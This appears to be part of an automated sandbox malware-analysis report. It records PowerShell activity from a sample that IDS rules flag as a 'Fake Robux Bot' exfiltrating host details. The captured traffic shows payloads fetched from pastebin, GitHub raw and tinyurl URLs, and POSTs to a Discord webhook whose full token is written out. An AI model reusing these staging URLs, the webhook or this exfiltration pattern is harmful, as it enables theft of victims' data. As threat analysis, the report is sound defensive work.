Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbI3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_` source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC:\W source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb^ source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbata\ source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000001C.00000002.3250944670.0000025E7D907000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdbt source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: -C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll
Source: Binary string: rlib.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC666000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb9$M source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A4B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbe089Z source: powershell.exe, 00000018.00000002.3192927958.00000223CF610000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516094783.00000278B4203000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF86D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb!3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbH$- source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrS source: powershell.exe, 00000018.00000002.3196743622.00000223CF8EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbjk source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb9dll source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb` source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbB source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49832 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49888 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49890 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49889 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:49971 -> 162.159.136.232:443
Source: Network trafficSuricata IDS: 2857659 - Severity 1 - ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil : 192.168.2.6:50012 -> 162.159.136.232:443
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: pastebin.com
Source: unknownDNS query: name: tinyurl.com
Source: unknownDNS query: name: tinyurl.com
Source: Joe Sandbox ViewIP Address: 162.159.136.232 162.159.136.232
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /yeykydun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: tinyurl.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tinyurl.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 299Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:15 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000817x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jff%2FeMVO2KG17lc8vGu0fRk5DWy%2FjJU23fOMhXWfuWEM2og69ON5FdHTrRS%2F7lRPnuRdrtajEZQeGicHz9%2B2WpVkcWUXDmioWOAUEcdAeldMhKptrUUT%2Bujk1d7U"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=69e39aecfecfdac47cfdc161cc57c10f88539518-1729000815; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=Ho1f9XAeszMYfSRJmyoAWCg.9y_pkJ1rIfYEaAZhERE-1729000815740-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d305599ab2f478d-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:25 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000826x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vWF2vJvMk0W8tny4KPx5%2B9OdLNhXvCQpJMC31ZbJju5XziaPQeLWMs6YUqt2fN03SJf9HMVpAmjOljD7MlqjgkWCFbR4cVtNG%2BTS3Vm4dMBuVU3h2a%2Fv4NP4MJvk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=TT0GGYcYwONH2Rv7OtXW9F2ggNPn0x86vCodexDNci4-1729000825599-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3055d76861e5b5-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:25 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 3x-ratelimit-reset: 1729000827x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pCd9sAtAPFvL8TMzqi70eNOKIel4ISsUHchNj2P6Y%2BEwwpTZ3vGIiPmxlPvlXB8zWYsD%2FHJqj7RTwoTBrv2nEoi3MDo5aeCTSs6P59Nij18zK6dsSAt9bFJBQVQ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=mZqAcWGFCoWOO36NRcRqxgiI4Kd08HYF3S1w_qbNPhI-1729000825638-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d3055d79a22474e-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:00:25 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 2x-ratelimit-reset: 1729000827x-ratelimit-reset-after: 2via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2FjNmdU17uOHYJHxxD7YUtZMp%2Fq1c0fR3XnWVHXpdwkkKjV%2BPlWgmKwHgoqMhIp%2BMQfGfRobQAf9S7O4Ktnj0CgoslX52T%2FbjqwpbJ3S6PPAlgbdlRcL0668qfIl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=050eb5be000dd04550d85db9e7fbbd1aef63545d-1729000825; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=QyY4bEJrOjzhqaN.da..q9PGkGXCVz9.TBkJo9a77QI-1729000825651-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: 